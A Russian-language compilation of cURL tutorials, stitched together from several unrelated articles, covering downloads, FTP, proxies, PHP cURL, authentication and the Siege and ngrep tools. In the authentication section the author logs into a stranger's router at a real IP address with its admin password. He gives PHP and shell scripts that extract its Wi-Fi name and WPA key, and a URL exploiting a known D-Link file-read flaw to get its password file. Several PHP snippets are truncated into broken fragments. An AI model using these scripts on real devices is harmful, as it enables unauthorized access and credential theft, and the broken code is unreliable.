cURL — это пакет программного обеспечения, состоящий из утилиты командной строки и библиотеки для передачи данных с использованием синтаксиса URL.

cURL поддерижвает множество протоколов, среди них DICT, FILE, FTP, FTPS, Gopher, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SCP, SFTP, SMTP, SMTPS, Telnet и TFTP.

Загрузить отдельный файл

Следующая команда получит содержимое URL и отобразит его в стандартном выводе (т. е. в вашем терминале).

Curl https://mi-al.ru/ > mi-al.htm % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 14378 0 14378 0 0 5387 0 --:--:-- 0:00:02 --:--:-- 5387

Сохранение вывода cURL в файл

-o (o нижнего регистра) результат будет сохранён в файле, заданном в командной строке
-O (O верхнего регистра) имя файла будет взято из URL и будет использовано для сохранения полученных данных.

$ curl -o mygettext.html http://www.gnu.org/software/gettext/manual/gettext.html

Теперь будет сохранена страница gettext.html в файле с названием ‘mygettext.html’. Когда curl запущена с опцией -o, она отображает шкалу прогресса загрузки следующим образом.

% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 66 1215k 66 805k 0 0 33060 0 0:00:37 0:00:24 0:00:13 45900 100 1215k 100 1215k 0 0 39474 0 0:00:31 0:00:31 --:--:-- 68987

Когда вы используете curl -O (O верхнего регистра), она сама по себе сохранит содержимое в файл под названием ‘gettext.html’ на локальной машине.

$ curl -O http://www.gnu.org/software/gettext/manual/gettext.html

Примечание: Когда curl должна писать данные в терминал, она отключает шкалу прогресса, чтобы не было путаницы в напечатанных данных. Мы можем исользовать ‘>’|’-o’|’-O’ опции для передачи результатов в файл.

Выборка нескольких файлов одновременно

Мы можем загрузить несколько файлов за один раз, задав все URL в командной строке.

Curl -O URL1 -O URL2

Команда ниже загрузит оба index.html и gettext.html и сохранит их с теми же именами в текущей директории.

Curl -O http://www.gnu.org/software/gettext/manual/html_node/index.html -O http://www.gnu.org/software/gettext/manual/gettext.html

Пожалуйста, обратите внимание, когда мы загружаем несколько файлов с одного сервера как показано выше, curl попытается повторно использовать соединение.

Следуем за HTTP Location в заголовках с опцией -L

По умолчанию, CURL не следует за HTTP Location в заголовках (редиректы). Когда запрошенная веб-страница перемещена в другое место, то соответствующий ответ будет передан в заголовках HTTP Location.

Например, когда кто-то печатает google.com в строке браузера из своей страны, они автоматически будут перенаправлены на ‘google.co.xx’. Это делается на основе заголовка HTTP Location как показано ниже.

Curl https://www.google.com/?gws_rd=ssl 302 Moved

302 Moved

The document has moved here.

Приведённый выше вывод говорит, что запрашиваемый документ был перемещён в ‘http://www.google.co.th/’.

Вы можете указать curl следовать редиректам, это делается с использованием опции -L как показано ниже. Теперь будет загружен исходный код html с https://www.google.co.th/?gws_rd=ssl.

Curl -L https://www.google.com/?gws_rd=ssl

Продоление/Вообновление предыдущей закачки

Используя опцию -C вы можете продолжить закачку, которая была остановлена по каким-либо причинам. Это будет полезным при обрыве загрузки больших файлов.

Если мы говорим ‘-C -’, то curl будет искать, с какого места возобновить загрузку. Мы также можем задать ‘-C <смещение>’. Заданное смещение байт будет пропущено от начала исходного файла.

Начните большую загрузку с curl и нажмите Ctrl-C для остановки посреди закачки.

$ curl -O http://www.gnu.org/software/gettext/manual/gettext.html ############## 20.1%

Закачка была остановлена на 20.1%. Используя “curl -C -” мы можем продолжить загрузку с того места, где мы остановились. Теперь загрузка продолжиться с 20.1%.

Curl -C - -O http://www.gnu.org/software/gettext/manual/gettext.html ############### 21.1%

Ограничение скорости передачи данных

Вы можете ограничить величину скорости передачи данных опцией -limit-rate. Вы можете передать максимальную скорость в качестве аргумента.

$ curl --limit-rate 1000B -O http://www.gnu.org/software/gettext/manual/gettext.html

Команда выше ограничит скорость передачи на 1000 байт/секунду. curl может использовать скорость выше на пиках. Но средняя скорость будет примерно 1000 байт/секунду.

Ниже показан индикатор прогресса для представленной выше команды. Вы можете видеть, что текущая скорость в районе 1000 байт.

% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 1 1215k 1 13601 0 0 957 0 0:21:40 0:00:14 0:21:26 999 1 1215k 1 14601 0 0 960 0 0:21:36 0:00:15 0:21:21 999 1 1215k 1 15601 0 0 962 0 0:21:34 0:00:16 0:21:18 999

Загрузить файл только если он изменён до/после заданного времени

Вы можете получить файлы, которые были изменены после определённого времени, используя опцию -z в curl. Это будет работать и для FTP и для HTTP.

$ curl -z 20-Aug-14

Команда выше загрузит yy.html только если он изменялся позднее чем заданная дата и время.

Команда выше загрузит файл file.html, если он изменялся до заданной даты и времени.

Наберите ‘man curl_getdate’ чтобы узнать больше о различных поддерживаемых синтаксисах для выражений даты.

Прохождение аутентификации HTTP в cURL

Иногда веб-сайты требуют имя пользователя и пароль для просмотра их содержимого. С помощью опции -u вы можете передать эти учётные данные из cURL на веб-сервер как показано ниже.

$ curl -u username:password URL

Примечание: По умолчанию curl использует базовую HTTP аутентификацию. Мы можем задать иные методы аутентификации используя -ntlm | -digest.

Загрузка файлов с FTP сервера

cURL может также использоваться для загрузки файлов с FTP серверов. Если заданный FTP путь является директорией, то по умолчанию будет выведен список файлов в ней.

$ curl -u ftpuser:ftppass -O ftp://ftp_server/public_html/xss.php

Команда выше загрузит файл xss.php с ftp-сервера и сохранит его в локальной директории.

$ curl -u ftpuser:ftppass -O ftp://ftp_server/public_html/

Здесь URL отсылает к директории. Следовательно, cURL сделает список файлов и директорий по заданному URL адресу.

Список/Загрузка с использованием диапазонов.

CURL поддерживает диапазоны заданные в URL. Когда дан диапазон, будут загружены соответствующие файлы внутри этого диапазона. Это будет полезным при загрузке пакетов с сайтов FTP зеркал.

$ curl ftp://ftp.uk.debian.org/debian/pool/main//

Команда выше сделает список всех пакетов в диапазоне a-z в терминале.

Выгрузка файлов на FTP-сервер

Curl также может использоваться для выгрузки на FTP-сервер с опцией -T.

$ curl -u ftpuser:ftppass -T myfile.txt ftp://ftp.testserver.com

Команда выше выгрузит файл с именем myfile.txt на FTP-сервер. Вы можете также выгрузить несколько файлов за один раз используя диапазоны.

$ curl -u ftpuser:ftppass -T "{file1,file2}" ftp://ftp.testserver.com

Опционально мы можем использовать “.” для получения из стандартного ввода и передачи его на удалённую машину.

$ curl -u ftpuser:ftppass -T - ftp://ftp.testserver.com/myfile_1.txt

Команда выше получит вывод от пользователя из стандартного ввода и сохранит содержимое на ftp-сервере под именем ‘myfile_1.txt’.

Вы можете задать ‘-T’ для каждого URL, и каждая пара адрес-файл будут определять что куда выгружать

Больше информации с увеличением вербальности и опцией трассировки

Вы можете узнать что происходит, используя опцию -v. Опция -v включает вербальный режим и будет печатать подробности.

Curl -v https://www.google.co.th/?gws_rd=ssl

Команда выше выведет следующее

* Rebuilt URL to: https://www.google.co.th/?gws_rd=ssl * Hostname was NOT found in DNS cache * Trying 27.123.17.49... * Connected to www.google.co.th (27.123.17.49) port 80 (#0) > GET / HTTP/1.1 > User-Agent: curl/7.38.0 > Host: www.google.co.th > Accept: */* > < HTTP/1.1 200 OK < Date: Fri, 14 Aug 2015 23:07:20 GMT < Expires: -1 < Cache-Control: private, max-age=0 < Content-Type: text/html; charset=windows-874 < P3P: CP="This is not a P3P policy! See https://support.google.com/accounts/answer/151657?hl=en for more info." * Server gws is not blacklisted < Server: gws < X-XSS-Protection: 1; mode=block < X-Frame-Options: SAMEORIGIN < Set-Cookie: PREF=ID=1111111111111111:FF=0:TM=1439593640:LM=1439593640:V=1:S=FfuoPPpKbyzTdJ6T; expires=Sun, 13-Aug-2017 23:07:20 GMT; path=/; domain=.google.co.th ... ... ...

Если вам нужно больше детальной информации, тогда вы можете использовать опцию -trace. Опция -trace включит полный дамп трассировки всех входящих/исходящих данных для заданного файла

=> Send header, 169 bytes (0xa9) 0000: 47 45 54 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a GET / HTTP/1.1.. 0010: 55 73 65 72 2d 41 67 65 6e 74 3a 20 63 75 72 6c User-Agent: curl .. 0060: 2e 32 2e 33 2e 34 20 6c 69 62 69 64 6e 2f 31 2e .2.3.4 libidn/1. 0070: 31 35 20 6c 69 62 73 73 68 32 2f 31 2e 32 2e 36 15 libssh2/1.2.6 0080: 0d 0a 48 6f 73 74 3a 20 77 77 77 2e 67 6f 6f 67 ..Host: www.goog 0090: 6c 65 2e 63 6f 2e 69 6e 0d 0a 41 63 63 65 70 74 le.co.xx..Accept 00a0: 3a 20 2a 2f 2a 0d 0a 0d 0a: */*.... == Info: HTTP 1.0, assume close after body <= Recv header, 17 bytes (0x11) 0000: 48 54 54 50 2f 31 2e 30 20 32 30 30 20 4f 4b 0d HTTP/1.0 200 OK. 0010: 0a

Опции увеличения вербальности и трассировки пригодятся, когда curl терпит неудачу по каким-то причинам и мы не знаем почему.

Получаем определение слова и его перевод с использованием протокола DICT

Посмотреть список доступных словарей можно так:

Curl dict://dict.org/show:db

Получить перевод слова с английского на русский можно так:

Curl dict://dict.org/d:girl:fd-eng-rus 220 pan.alephnull.com dictd 1.12.1/rf on Linux 3.14-1-amd64 <[email protected]> 250 ok 150 1 definitions retrieved 151 "girl" fd-eng-rus "English-Russian FreeDict Dictionary ver. 0.3" girl /gəːl/ девушка. 250 ok 221 bye

Больше информации по DICT можно найти прочитав RFC2229 .

Использование прокси для загрузки файла

Мы можем указать cURL использовать прокси для определённых операций, это делается опцией -x. Нам нужно задать хост и порт прокси.

$ curl -x proxysever.test.com:3128 https://www.google.co.in/?gws_rd=ssl

Отправка электронной почты с использованием протокола SMTP в curl

cURL также может быть использована для отправки электронной почты по протоколу SMTP. Вам нужно указать адрес от кого, адрес кому и IP адрес почтового сервера как показано ниже.

$ curl --mail-from [email protected] --mail-rcpt [email protected] smtp://mailserver.com

Когда команда будет введена, начнётся ожидание введения пользователем данных для письма. Когда вы закончите набирать сообщение, напечатайте. (точку) в качестве последней строки, и письмо будет немедленно отправлено.

Subject: Testing This is a test mail .

Гарант является доверенным посредником между Участниками при проведении сделки.

Представляем вашему вниманию новый курс от команды The Codeby - "Тестирование Веб-Приложений на проникновение с нуля". Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое.

Для чего нужна cURL

cURL отлично подходит для имитации действий пользователя в браузере.

Реальный практический пример: вам нужно перезагрузить роутер (модем) для смены IP адреса. Для этого нужно: авторизоваться в роутере, перейти к странице обслуживания и нажать кнопку «Перезагрузка». Если это действие нужно выполнить несколько раз, то процедуру нужно повторить. Согласитесь, делать каждый раз в ручную эту рутину не хочется. cURL позволяет автоматизировать всё это. Буквально несколькими командами cURL можно добиться авторизации и выполнения задания на роутере.

cURL удобен для получения данных с веб-сайтов в командной строке.

Ещё один практический пример: мы хотим реализовать показ общей статистики для нескольких сайтов. Если использовать cURL, то это становится вполне тривиальной задачей: с помощью cURL мы проходим аутентификацию на сервисе сбора статистики (если это требуется), затем (опять же командами cURL) получаем необходимые страницы, парсим нужные нам данные; процедура повторяется для всех наших сайтов, затем мы складываем и выводим конечный результат.

Т.е. случаи использования cURL вполне реальные, хотя, в большинстве, cURL нужна программистам, которые используют её для своих программ.

cURL поддерживает множество протоколов и способов авторизации, умеет передавать файлы, правильно работает с кукиз, поддерживает SSL сертификаты, прокси и очень многое другое.

cURL в PHP и командной строке

Мы можем использовать cURL двумя основными способами: в скриптах PHP и в командной строке.

Чтобы включить cURL в PHP на сервере, необходимо в файле php.ini раскоментировать строку

Extension=php_curl.dll

А затем перезагрузить сервер.

На Linux необходимо установить пакет curl.

На Debian, Ubuntu или Linux Mint:

$ sudo apt-get install curl

На Fedora, CentOS или RHEL:

$ sudo yum install curl

Чтобы наглядно было видно разницу в использовании в PHP и в командной строке, будем одни и те же задачи выполнять дважды: сначала в скрипте PHP, а затем в командной строке. Постараемся при этом не запутаться.

Получение данных при помощи cURL

Получение данных при помощи cURL в PHP

Пример на PHP:

Всё очень просто:

$target_url — адрес сайта, который нас интересует. После адреса сайта можно поставить двоеточие и добавить адрес порта (если порт отличается от стандартного).

curl_init — инициализирует новый сеанс и возвращает дискриптор, который в нашем примере присваивается переменной $ch .

Затем мы выполняем запрос cURL функцией curl_exec , которой в качестве параметра передаётся дискриптор.

Всё очень логично, но при выполнении этого скрипта, на нашей странице отобразиться содержимое сайта. А что если мы не хотим отображать содержимое, а хотим записать его в переменную (для последующей обработки или парсинга).

Чуть дополним наш скрипт:

0) { echo "Ошибка curl: " . curl_error($ch); } curl_close($ch); ?>

У нас появилась строчка curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); .

curl_setopt — задаёт опции. Полный список опций можно найти на этой странице: http://php.net/manual/ru/function.curl-setopt.php

$response_data = curl_exec($ch);

Теперь значение скрипта присваивается переменной $response_data, с которой можно проводить дальнейшие операции. Например, можно вывести её содержимое.

If (curl_errno($ch) > 0) { echo "Ошибка curl: " . curl_error($ch); }

служат для отладки, на случай возникновения ошибок.

Получение данных при помощи cURL в командной строке

В командной строке достаточно набрать

Curl mi-al.ru

где вместо mi-al.ru — адрес вашего сайта.

Если нужно скопировать данные в переменную, а не выводить полученный результат на экран, то делаем так:

Temp=`curl mi-al.ru`

При этом всё равно выводятся некие данные:

Чтобы они не выводились, добавляем ключ -s :

Temp=`curl -s mi-al.ru`

Можно посмотреть, что записалось:

Echo $temp | less

Базовая аутентификация и аутентификация HTTP

Аутентификация, проще говоря, это введение имени пользователя и пароля.

Базовая аутентификация — это аутентификация средствами сервера. Для этого создаются два файла: .htaccess и .htpasswd

Содержимое файла.htaccess примерно такое

AuthName "Только для зарегистрированных пользователей!" AuthType Basic require valid-user AuthUserFile /home/freeforum.biz/htdocs/.htpassw

Содержимое файла.htpasswd примерно такое:

Mial:CRdiI.ZrZQRRc

Т.е. логин и хэш пароля.

При попытке получить доступ к запароленной папке, в браузере отобразиться примерно такое окно:

HTTP аутентификация — это тот случай, когда мы вводим логин и пароль в форму на сайте. Именно такая аутентификация используется при входе в почту, на форумы и т. д.

Базовая аутентификация cURL (PHP)

Есть сайт http://62.113.208.29/Update_FED_DAYS/, который требует от нас авторизоваться:

Пробуем наш первоначальный скрипт:

0) { echo "Ошибка curl: " . curl_error($ch); } else { echo $response_data; } curl_close($ch); ?>

Хотя скрипт и считает, что ошибки нет, но выводимый результат нам совсем не нравится:

Добавляем две строки:

Curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, "ru-board:ru-board");

Первой строкой мы задаём тип аутентификации — базовая. Вторая строка содержит имя и пароль через двоеточие (в нашем случае имя и пароль одинаковые — ru-board). Получилось так:

0) { echo "Ошибка curl: " . curl_error($ch); } else { echo $response_data; } curl_close($ch); ?>

Базовая аутентификация cURL (в командной строке)

Этого же самого в командной строке можно добиться одной строчкой:

Curl -u ru-board:ru-board http://62.113.208.29/Update_FED_DAYS/

Я не забыл указать тип аутентификации, просто в cURL базовый тип аутентификации является дефолтным.

В командной строке всё получилось так быстро, что от расстройства я написал вот такую программу. Она подключается к сайту и скачивает самое последнее обновление:

Temp=`curl -s -u ru-board:ru-board http://62.113.208.29/Update_FED_DAYS/ | grep -E -o "Update_FED_201{1}.{2}.{2}.7z" | uniq | tail -n 1`; curl -o $temp -u ru-board:ru-board http://62.113.208.29/Update_FED_DAYS/$temp

Буквально ещё несколькими командами можно добавить:

распаковку архива в указанный каталог;
запуск обновлений КонсультантПлюс (это обновления для него);
можно реализовать проверку — было ли уже скачено последнее доступное обновление или появилось новое;
добавить это всё в Cron для ежедневных обновлений.

HTTP аутентификация cURL

HTTP аутентификация cURL в PHP

Нам нужно знать:

адрес, куда отправлять данные для аутентификации
метод отправки GET или POST
логин
пароль

Иногда этих данных оказывается недостаточно. Давайте разберёмся.

Адрес, куда нужно отправить данные, можно взять из формы аутентификации. Например:

Мы смотрим на свойство action . Т.е. конечной страницей является login.php . Нам нужен полный адрес, например такой http://188.35.8.64:8080/login.php

Здесь же мы находим и метод отправки: method="post"

Логин и пароль я тоже знаю: admin и qwerasdfzxcv

На всякий случай — это не мой роутер (и я не знаю чей), поэтому если вы хотите досадить именно мне, то не нужно пакостить на этом роутере.

Т.е. на сервер из формы передаётся строка методом POST. Теоретически, наш предыдущий скрипт, в которое мы добавили новую строчку, должен работать. Т.е. должна происходить аутентификация.

0) { echo "Ошибка curl: " . curl_error($ch); } else { } curl_close($ch); ?>

В скрипте новая строка

curl_setopt($ch, CURLOPT_POSTFIELDS, "LOGIN_USER=admin&LOGIN_PASSWD=qwerasdfzxcv");

Здесь curl_setopt — уже знакомая нам функция по установлению опций для cURL, CURLOPT_POSTFIELDS — эта имя опции, которую мы устанавливаем. CURLOPT_POSTFIELDS содержит все данные, которые передаются методом POST. Ну и сама строчка LOGIN_USER=admin&LOGIN_PASSWD=qwerasdfzxcv — это те самые данные, которые мы передаём.

Если внимательно изучить форму, то можно увидеть, что она содержит также и скрытые поля. А ещё данные могут обрабатываться или дополняться JavaScript"ами. Можно заняться изучением всего этого, но я предпочитаю более простой способ.

Я использую Wireshark. Эта программа предназначена для снифинга (перехвата) трафика. И именно в ней очень удобно смотреть, что же именно передаётся на сайт.

Посмотрите это крошечное видео:

Т.е. с адресом, куда передаются данные, я угадал. А вот передаваемая строка оказалась намного сложнее.

Я вписал верный параметр, а также чуть доработал скрипт, чтобы он не просто авторизовался, но и кое-что получал из роутера:

0) { echo "Ошибка curl: " . curl_error($ch); } else { $target_url2 = "http://188.35.8.64:8080/bsc_wlan.php"; $ch2 = curl_init($target_url2); curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1); $response_data2 = curl_exec($ch2); preg_match("|f.ssid.value = "(.*)";|", $response_data2, $results2); $results2 = str_replace("f.ssid.value = "", "", $results2); $results2 = str_replace("";", "", $results2); echo "Имя wi-fi сети: $results2
"; preg_match("|f_wpa.wpapsk1.value(.*)";|", $response_data2, $results3); $results3 = str_replace("f_wpa.wpapsk1.value", "", $results3); $results3 = str_replace("="", "", $results3); $results3 = str_replace("";", "", $results3); echo "Пароль wi-fi сети: $results3"; } curl_close($ch); ?>

Кстати, если владелец обновит пароль (но не обновит прошивку), то новый пароль всегда можно посмотреть по адресу http://188.35.8.64:8080/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd

(Это общеизвестная уязвимость роутеров D-Link DIR-300, D-Link DIR-320, и D-Link DAP-1353).

HTTP аутентификация cURL в командной строке

Полный адрес, а также строку, которую нужно передать, мы уже знаем. Поэтому всё просто:

Curl --data "ACTION_POST=LOGIN&FILECODE=&VERIFICATION_CODE=&LOGIN_USER=admin&LOGIN_PASSWD=qwerasdfzxcv&login=Log+In+&VER_CODE=" http://188.35.8.64:8080/login.php

Думаю, всё и так понятно, т. к. эти сроки мы уже рассмотрели. Если кому-то непонятно — спрашивайте в комментариях.

Примером использования cURL для получения и парсинга данных может стать следующий набор команд:

Curl -s --data "ACTION_POST=LOGIN&FILECODE=&VERIFICATION_CODE=&LOGIN_USER=admin&LOGIN_PASSWD=qwerasdfzxcv&login=Log+In+&VER_CODE=" http://188.35.8.64:8080/login.php > /dev/null && echo -e "nn" && echo "Имя сети Wi-Fi" && curl -s http://188.35.8.64:8080/bsc_wlan.php | grep -E "f.ssid.value = "(.)*";" | sed "s/f.ssid.value = "//" | sed "s/";//" && echo "Пароль сети Wi-Fi" && curl -s http://188.35.8.64:8080/bsc_wlan.php | grep -E "f_wpa.wpapsk1.(.)*";" | sed "s/f_wpa.wpapsk1.value//" | sed "s/";//" | sed "s/="//"

Сложные случаи авторизации: AJAX, JQuery, JavaScript и т.п.

Данные заголовок правильнее было бы написать так: «Сложные» случаи авторизации. Т.е. слово «сложные» взять в кавычки. Сложными они видятся только на первый взгляд, когда непонятно: куда происходит отправка, какие имена полей, что именно отправляется и т. д.

Но, на самом деле, все они сводятся к методам POST или GET. Чтобы понять, что именно отправляется, можно сохранить страницу с формой себе на диск и на кнопку отправки повесить функцию показа сформированных для отправки данных. Или ещё проще — как я, Wireshark"ом.

Если данные правильные, а аутентификация не происходит, то нужно копать в следующих направлениях:

задать верную строку реферера
задать «правильную» строку пользовательского агента.

Всё это можно сделать базовыми методами cURL, но я не буду на этом останавливаться. Урок получился и без того большим, а ведь я ещё хотел показать пару трюков с cURL.

Типсы и триксы cURL

cURL и получение кукиз помимо CURLOPT_COOKIEJAR

Думаю, уже стало понятно, что cURL правильно обрабатывает куки — сохраняет их, использует, когда сервер запрашивает, и т. д. Но иногда куки нужно сохранить. Для этого есть опция CURLOPT_COOKIEJAR, но воспользоваться ей можно не всегда. Этому и посвящён наш первый трюк.

Иногда из-за особенностей настройки PHP на сервере, нам недоступны такие опции как CURLOPT_COOKIEJAR (позволяет сохранить полученные куки в файл) и CURLOPT_COOKIEFILE (позволяет использовать куки из файла). Т.к. они говорят, что используя эти опции мы сможем стянуть любой файл с их сервера. Вот решение этой проблемы:

1) Не используем CURLOPT_FOLLOWLOCATION

2) Используем curl_setopt($ch, CURLOPT_HEADER, 1)

3) Собираем кукизы из заголовка header примерно так:

Preg_match_all("|Set-Cookie: (.*);|U", $content, $results); $cookies = implode(";", $results);

4) Задаём их используя curl_setopt($ch, CURLOPT_COOKIE, $cookies);

Второй совет. Из атакующих мы можем превратиться в жертву. Чтобы не стать жертвой атаки человек-по-середине, делаем так.

Пожалуйста, все, перестаньте устанавливать настройку CURLOPT_SSL_VERIFYPEER на false или 0. Если ваша установка PHP не имеет актуального комплекта корневых сертификатов CA, загрузите один на веб-сайте curl и сохраните его на ваш сервер:

Затем задайте путь в вашем файле php.ini file, например, на Windows:

Curl.cainfo=c:phpcacert.pem

Отключение CURLOPT_SSL_VERIFYPEER позволяет осуществить атаку человек-по-середине (MITM), а это нам не надо!

Ну и последняя на сегодня подсказка. Знаете ли вы, что возможно большое количество асинхронных запросов curl?

Для этого можно использовать curl_multi_init . Подробности и пример кода в официальной документации http://php.net/manual/ru/function.curl-multi-init.php

Про cURL в командной строке

Man curl

Для чтения на русском языке также подготовлена вторая часть урока cURL: " ".

Гарант является доверенным посредником между Участниками при проведении сделки.

Жизнь веб-разработчика омрачена сложностями. Особенно неприятно, когда источник этих сложностей неизвестен. То ли это проблема с отправкой запроса, то ли с ответом, то ли со сторонней библиотекой, то ли внешний API глючит? Существует куча различных прилад, способных упростить нам жизнь. Вот некоторые инструменты командной строки, которые лично я считаю бесценными.

cURL
cURL - программа для передачи данных по различным протоколам, похожая на wget. Основное отличие в том, что по умолчанию wget сохраняет в файл, а cURL выводит в командную строку. Так можно очень просто посмотреть контент веб-сайта. Например, вот как быстро получить свой текущий внешний IP:

$ curl ifconfig.me 93.96.141.93
Параметры -i (показывать заголовки) и -I (показывать только заголовки) делают cURL отличным инструментом для дебаггинга HTTP-ответов и анализа того, что конкретно сервер вам отправляет:

$ curl -I habrahabr.ru HTTP/1.1 200 OK Server: nginx Date: Thu, 18 Aug 2011 14:15:36 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Keep-alive: timeout=25
Параметр -L тоже полезный, он заставляет cURL автоматически следовать по редиректам. cURL поддерживает HTTP-аутентификацию, cookies, туннелирование через HTTP-прокси, ручные настройки в заголовках и многое, многое другое.

Siege
Siege - инструмент для нагрузочного тестирования. Плюс, у него есть удобная опция -g , которая очень похожа на curl –iL , но вдобавок показывает вам ещё и заголовки http-запроса. Вот пример с google.com (некоторые заголовки удалены для краткости):

$ siege -g www.google.com GET / HTTP/1.1 Host: www.google.com User-Agent: JoeDog/1.00 (X11; I; Siege 2.70) Connection: close HTTP/1.1 302 Found Location: http://www.google.co.uk/ Content-Type: text/html; charset=UTF-8 Server: gws Content-Length: 221 Connection: close GET / HTTP/1.1 Host: www.google.co.uk User-Agent: JoeDog/1.00 (X11; I; Siege 2.70) Connection: close HTTP/1.1 200 OK Content-Type: text/html; charset=ISO-8859-1 X-XSS-Protection: 1; mode=block Connection: close
Но для чего Siege действительно великолепно подходит, так это для нагрузочного тестирования. Как и апачевский бенчмарк ab , он может отправить множество параллельных запросов к сайту и посмотреть, как он справляется с трафиком. В следующем примере показано, как мы тестируем Google с помощью 20 запросов в течение 30 секунд, после чего выводится результат:

$ siege -c20 www.google.co.uk -b -t30s ... Lifting the server siege... done. Transactions: 1400 hits Availability: 100.00 % Elapsed time: 29.22 secs Data transferred: 13.32 MB Response time: 0.41 secs Transaction rate: 47.91 trans/sec Throughput: 0.46 MB/sec Concurrency: 19.53 Successful transactions: 1400 Failed transactions: 0 Longest transaction: 4.08 Shortest transaction: 0.08
Одна из самых полезных функций Siege - то, что он может работать не только с одним адресом, но и со списком URL’ов из файла. Это отлично подходит для нагрузочного тестирования, потому что можно моделировать реальный трафик на сайте, а не просто жать один и тот же URL снова и снова. Например, вот как использовать Siege, чтобы нагрузить сервер, используя адреса из вашего лога Apache:

$ cut -d " " -f7 /var/log/apache2/access.log > urls.txt $ siege -c -b -f urls.txt
Ngrep
Для серьёзного анализа трафика существует Wireshark с тысячами настроек, фильтров и конфигураций. Есть также версия для командной строки tshark . Но для простых задач функционал Wireshark я считаю избыточным. Так что до тех пор, пока мне не нужно мощное оружие, я использую . Он позволяет делать с сетевыми пакетами то же самое, что grep делает с файлами.

Для веб-трафика вы почти всегда захотите использовать параметр -W , чтобы сохранить форматирование строк, а также параметр -q , который скрывает избыточную информацию о неподходящих пакетах. Вот пример команды, которая перехватывает все пакеты с командой GET или POST:

Ngrep -q -W byline "^(GET|POST) .*"
Вы можете добавить дополнительный фильтр для пакетов, например, по заданному хосту, IP-адресу или порту. Вот фильтр для всего входящего и исходящего трафика на google.com, порт 80, который содержит слово “search”.

Ngrep -q -W byline "search" host www.google.com and port 80

cURL - это специальный инструмент, который предназначен для того, чтобы передавать файлы и данные синтаксисом URL. Данная технология поддерживает множество протоколов, таких как HTTP, FTP, TELNET и многие другие. Изначально cURL было разработано для того, чтобы быть инструментом командной строки. К счастью для нас, библиотека cURL поддерживается языком программирования PHP. В этой статье мы рассмотрим некоторые расширенные функций cURL, а также затронем практическое применение полученных знаний средствами PHP.

Почему cURL?

На самом деле, существует немало альтернативных способов выборки содержания веб-страницы. Во многих случаях, главным образом из-за лени, я использовал простые PHP функции вместо cURL:

$content = file_get_contents("http://www.nettuts.com"); // или $lines = file("http://www.nettuts.com"); // или readfile("http://www.nettuts.com");

Однако данные функции не имеют фактически никакой гибкости и содержат огромное количество недостатков в том, что касается обработки ошибок и т.д. Кроме того, существуют определенные задачи, которые вы просто не можете решить благодаря этим стандартным функциям: взаимодействие с cookie, аутентификация, отправка формы, загрузка файлов и т.д.

cURL - это мощная библиотека, которая поддерживает множество различных протоколов, опций и обеспечивает подробную информацию о URL запросах.

Базовая структура

Инициализация
Назначение параметров
Выполнение и выборка результата
Освобождение памяти

// 1. инициализация $ch = curl_init(); // 2. указываем параметры, включая url curl_setopt($ch, CURLOPT_URL, "http://www.nettuts.com"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); // 3. получаем HTML в качестве результата $output = curl_exec($ch); // 4. закрываем соединение curl_close($ch);

Шаг #2 (то есть, вызов curl_setopt()) будем обсуждать в этой статье намного больше, чем все другие этапы, т.к. на этой стадии происходит всё самое интересное и полезное, что вам необходимо знать. В cURL существует огромное количество различных опций, которые должны быть указаны, для того чтобы иметь возможность сконфигурировать URL-запрос самым тщательным образом. Мы не будем рассматривать весь список целиком, а остановимся только на том, что я посчитаю нужным и полезным для этого урока. Всё остальное вы сможете изучить сами, если эта тема вас заинтересует.

Проверка Ошибки

Вдобавок, вы также можете использовать условные операторы для проверки выполнения операции на успех:

// ... $output = curl_exec($ch); if ($output === FALSE) { echo "cURL Error: " . curl_error($ch); } // ...

Тут прошу отметить для себя очень важный момент: мы должны использовать “=== false” для сравнения, вместо “== false”. Для тех, кто не в курсе, это поможет нам отличать пустой результат от булевого значения false, которое и будет указывать на ошибку.

Получение информации

Ещё одним дополнительным шагом является получение данных о cURL запросе, после того, как он был выполнен.

// ... curl_exec($ch); $info = curl_getinfo($ch); echo "Took " . $info["total_time"] . " seconds for url " . $info["url"]; // …

Возвращаемый массив содержит следующую информацию:

“url”
“content_type”
“http_code”
“header_size”
“request_size”
“filetime”
“ssl_verify_result”
“redirect_count”
“total_time”
“namelookup_time”
“connect_time”
“pretransfer_time”
“size_upload”
“size_download”
“speed_download”
“speed_upload”
“download_content_length”
“upload_content_length”
“starttransfer_time”
“redirect_time”

Обнаружение перенаправления в зависимости от браузера

В этом первом примере мы напишем код, который сможет обнаружить перенаправления URL, основанные на различных настройках браузера. Например, некоторые веб-сайты перенаправляют браузеры сотового телефона, или любого другого устройства.

Мы собираемся использовать опцию CURLOPT_HTTPHEADER для того, чтобы определить наши исходящие HTTP заголовки, включая название браузера пользователя и доступные языки. В конечном итоге мы сможем определить, какие сайты перенаправляют нас к разным URL.

